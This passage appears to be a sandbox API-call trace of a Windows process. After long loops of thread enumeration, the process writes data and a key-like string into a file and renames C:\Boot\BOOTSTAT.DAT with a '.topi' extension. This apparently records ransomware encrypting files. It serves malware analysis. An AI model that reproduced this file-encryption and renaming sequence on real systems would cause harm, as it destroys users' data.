0x8c4 [0092.779] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.779] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.779] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.780] GetTickCount () returned 0x1172697 [0092.780] GetCurrentThreadId () returned 0x8c4 [0092.780] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.780] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.780] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.781] GetTickCount () returned 0x1172697 [0092.781] GetCurrentThreadId () returned 0x8c4 [0092.781] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.781] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.781] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.782] GetTickCount () returned 0x1172697 [0092.782] GetCurrentThreadId () returned 0x8c4 [0092.782] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.782] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.782] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.782] GetTickCount () returned 0x1172697 [0092.783] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.783] GetTickCount () returned 0x1172697 [0092.783] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.784] GetTickCount () returned 0x1172697 [0092.784] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.784] GetTickCount () returned 0x1172697 [0092.785] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.785] GetTickCount () returned 0x1172697 [0092.785] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.786] GetTickCount () returned 0x1172697 [0092.786] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.787] GetTickCount () returned 0x1172697 [0092.787] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.788] GetTickCount () returned 0x1172697 [0092.788] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.788] GetTickCount () returned 0x1172697 [0092.788] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.789] GetTickCount () returned 0x1172697 [0092.789] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.790] GetTickCount () returned 0x1172697 [0092.790] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.790] GetTickCount () returned 0x1172697 [0092.790] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.791] GetTickCount () returned 0x1172697 [0092.791] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.792] GetTickCount () returned 0x1172697 [0092.792] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.792] GetTickCount () returned 0x1172697 [0092.792] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.793] GetTickCount () returned 0x11726a7 [0092.793] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.794] GetTickCount () returned 0x11726a7 [0092.794] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.795] GetTickCount () returned 0x11726a7 [0092.795] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.796] GetTickCount () returned 0x11726a7 [0092.796] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.796] GetTickCount () returned 0x11726a7 [0092.797] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.797] GetTickCount () returned 0x11726a7 [0092.797] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.798] GetTickCount () returned 0x11726a7 [0092.798] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.799] GetTickCount () returned 0x11726a7 [0092.799] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.799] GetTickCount () returned 0x11726a7 [0092.799] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.800] GetTickCount () returned 0x11726a7 [0092.800] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.801] GetTickCount () returned 0x11726a7 [0092.801] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.802] GetTickCount () returned 0x11726a7 [0092.802] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.803] GetTickCount () returned 0x11726a7 [0092.803] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.803] GetTickCount () returned 0x11726a7 [0092.804] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.804] GetTickCount () returned 0x11726a7 [0092.804] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.805] GetTickCount () returned 0x11726a7 [0092.805] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.806] GetTickCount () returned 0x11726a7 [0092.806] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.807] GetTickCount () returned 0x11726a7 [0092.807] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.808] GetTickCount () returned 0x11726a7 [0092.808] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.808] GetTickCount () returned 0x11726b6 [0092.809] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.809] GetTickCount () returned 0x11726b6 [0092.809] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.810] GetTickCount () returned 0x11726b6 [0092.810] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.811] GetTickCount () returned 0x11726b6 [0092.811] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.812] GetTickCount () returned 0x11726b6 [0092.812] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.812] GetTickCount () returned 0x11726b6 [0092.812] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.813] GetTickCount () returned 0x11726b6 [0092.813] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.814] GetTickCount () returned 0x11726b6 [0092.814] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.815] GetTickCount () returned 0x11726b6 [0092.815] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.815] GetTickCount () returned 0x11726b6 [0092.815] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.816] GetTickCount () returned 0x11726b6 [0092.816] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.817] GetTickCount () returned 0x11726b6 [0092.817] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.818] GetTickCount () returned 0x11726b6 [0092.818] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.819] GetTickCount () returned 0x11726b6 [0092.819] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.820] GetTickCount () returned 0x11726b6 [0092.820] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.820] GetTickCount () returned 0x11726b6 [0092.820] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.821] GetTickCount () returned 0x11726b6 [0092.821] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.822] GetTickCount () returned 0x11726b6 [0092.822] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.823] GetTickCount () returned 0x11726b6 [0092.823] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.824] GetTickCount () returned 0x11726b6 [0092.824] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.824] GetTickCount () returned 0x11726c6 [0092.824] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.825] GetTickCount () returned 0x11726c6 [0092.825] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.826] GetTickCount () returned 0x11726c6 [0092.826] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.827] GetTickCount () returned 0x11726c6 [0092.827] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.827] GetTickCount () returned 0x11726c6 [0092.828] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.828] GetTickCount () returned 0x11726c6 [0092.828] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.829] GetTickCount () returned 0x11726c6 [0092.829] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.830] GetTickCount () returned 0x11726c6 [0092.830] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.831] GetTickCount () returned 0x11726c6 [0092.831] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.831] GetTickCount () returned 0x11726c6 [0092.831] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.832] GetTickCount () returned 0x11726c6 [0092.832] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.833] GetTickCount () returned 0x11726c6 [0092.833] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.833] GetTickCount () returned 0x11726c6 [0092.833] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.834] GetTickCount () returned 0x11726c6 [0092.834] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.835] GetTickCount () returned 0x11726c6 [0092.835] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.836] GetTickCount () returned 0x11726c6 [0092.836] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.837] GetTickCount () returned 0x11726c6 [0092.837] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.837] GetTickCount () returned 0x11726c6 [0092.837] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.838] GetTickCount () returned 0x11726c6 [0092.838] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.839] GetTickCount () returned 0x11726c6 [0092.839] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.840] GetTickCount () returned 0x11726d6 [0092.840] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.840] GetTickCount () returned 0x11726d6 [0092.840] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.841] GetTickCount () returned 0x11726d6 [0092.841] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.842] GetTickCount () returned 0x11726d6 [0092.842] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.843] GetTickCount () returned 0x11726d6 [0092.843] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.844] GetTickCount () returned 0x11726d6 [0092.844] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.844] GetTickCount () returned 0x11726d6 [0092.844] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.845] GetTickCount () returned 0x11726d6 [0092.845] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.846] GetTickCount () returned 0x11726d6 [0092.846] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.847] GetTickCount () returned 0x11726d6 [0092.847] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.847] GetTickCount () returned 0x11726d6 [0092.847] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.848] GetTickCount () returned 0x11726d6 [0092.848] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.849] GetTickCount () returned 0x11726d6 [0092.849] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.850] GetTickCount () returned 0x11726d6 [0092.850] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.851] GetTickCount () returned 0x11726d6 [0092.851] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.851] GetTickCount () returned 0x11726d6 [0092.852] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.852] GetTickCount () returned 0x11726d6 [0092.852] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.853] GetTickCount () returned 0x11726d6 [0092.853] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.854] GetTickCount () returned 0x11726d6 [0092.854] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.855] GetTickCount () returned 0x11726d6 [0092.855] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.855] GetTickCount () returned 0x11726e5 [0092.855] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.856] GetTickCount () returned 0x11726e5 [0092.856] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.857] GetTickCount () returned 0x11726e5 [0092.857] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.858] GetTickCount () returned 0x11726e5 [0092.858] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.858] GetTickCount () returned 0x11726e5 [0092.859] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.859] GetTickCount () returned 0x11726e5 [0092.859] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.860] GetTickCount () returned 0x11726e5 [0092.860] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.861] GetTickCount () returned 0x11726e5 [0092.861] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.861] GetTickCount () returned 0x11726e5 [0092.861] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.862] GetTickCount () returned 0x11726e5 [0092.862] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.863] GetTickCount () returned 0x11726e5 [0092.863] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.864] GetTickCount () returned 0x11726e5 [0092.931] FreeLibrary (hLibModule=0x76e10000) returned 1 [0092.931] QueryPerformanceCounter (in: lpPerformanceCount=0x9ccefa4 | out: lpPerformanceCount=0x9ccefa4*=32420483881) returned 1 [0092.931] GlobalMemoryStatus (in: lpBuffer=0x9ccf414 | out: lpBuffer=0x9ccf414) [0092.933] SetFilePointerEx (in: hFile=0x5d0, liDistanceToMove=0x10000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.933] WriteFile (in: hFile=0x5d0, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0092.973] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0092.973] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d2f8 [0092.973] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x31d01f0 [0092.973] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x31d01f0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0092.973] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d0980 [0092.973] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0092.974] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d2f8 | out: hHeap=0x680000) returned 1 [0092.974] WriteFile (in: hFile=0x5d0, lpBuffer=0x31d0980*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d0980*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0092.974] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d0980 | out: hHeap=0x680000) returned 1 [0092.974] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0092.974] WriteFile (in: hFile=0x5d0, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0092.974] CloseHandle (hObject=0x5d0) returned 1 [0092.975] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3e28 [0092.975] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0092.975] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3e28 | out: hHeap=0x680000) returned 1 [0092.975] MoveFileW (lpExistingFileName="C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), lpNewFileName="C:\\Boot\\BOOTSTAT.DAT.topi" (normalized: "c:\\boot\\bootstat.dat.topi")) returned 1 [0092.976] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0092.976] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3e98 | out: hHeap=0x680000) returned 1 [0092.976] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.977] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3ed0 | out: hHeap=0x680000) returned 1 [0092.977] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa3267ea0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3267ea0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cs-CZ", cAlternateFileName="")) returned 1 [0092.977] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eee60 [0092.977] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efcc0 [0092.977] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1c) returned 0x31eef00 [0092.977] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef388 [0092.977] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efcc0 | out: hHeap=0x680000) returned 1 [0092.977] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eee60 | out: hHeap=0x680000) returned 1 [0092.978] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa3267ea0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3267ea0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="da-DK", cAlternateFileName="")) returned 1 [0092.978] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eee60 [0092.978] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efcc0 [0092.978] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x38) returned 0x31c7500 [0092.978] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef130 [0092.978] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef388 | out: hHeap=0x680000) returned 1 [0092.978] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef00 | out: hHeap=0x680000) returned 1 [0092.978] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef00 [0092.978] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efcc0 | out: hHeap=0x680000) returned 1 [0092.978] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eee60 | out: hHeap=0x680000) returned 1 [0092.978] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa328e000, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa328e000, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="de-DE", cAlternateFileName="")) returned 1 [0092.978] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eee60 [0092.978] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efcc0 [0092.978] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x54) returned 0x99d9e08 [0092.978] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef388 [0092.978] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efab8 [0092.978] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef130 | out: hHeap=0x680000) returned 1 [0092.978] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef00 | out: hHeap=0x680000) returned 1 [0092.978] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c7500 | out: hHeap=0x680000) returned 1 [0092.978] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef00 [0092.978] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efcc0 | out: hHeap=0x680000) returned 1 [0092.978] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eee60 | out: hHeap=0x680000) returned 1 [0092.978] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa328e000, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa328e000, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="el-GR", cAlternateFileName="")) returned 1 [0092.978] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eee60 [0092.978] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efcc0 [0092.978] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x3161c80 [0092.978] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef130 [0092.978] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef888 [0092.978] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef338 [0092.978] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef388 | out: hHeap=0x680000) returned 1 [0092.978] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efab8 | out: hHeap=0x680000) returned 1 [0092.978] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef00 | out: hHeap=0x680000) returned 1 [0092.978] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0092.978] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef00 [0092.978] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efcc0 | out: hHeap=0x680000) returned 1 [0092.978] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eee60 | out: hHeap=0x680000) returned 1 [0092.978] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa32b4160, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa32b4160, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0092.979] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eee60 [0092.979] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efcc0 [0092.979] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa8) returned 0x3152ab8 [0092.979] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efab8 [0092.979] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef388 [0092.979] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef040 [0092.979] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7c0 [0092.979] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef130 | out: hHeap=0x680000) returned 1 [0092.979] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef888 | out: hHeap=0x680000) returned 1 [0092.979] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef338 | out: hHeap=0x680000) returned 1 [0092.979] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef00 | out: hHeap=0x680000) returned 1 [0092.979] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3161c80 | out: hHeap=0x680000) returned 1 [0092.979] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef00 [0092.979] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efcc0 | out: hHeap=0x680000) returned 1 [0092.979] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eee60 | out: hHeap=0x680000) returned 1 [0092.979] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa32da2c0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa32da2c0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="es-ES", cAlternateFileName="")) returned 1 [0092.979] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eee60 [0092.979] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efcc0 [0092.979] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef338 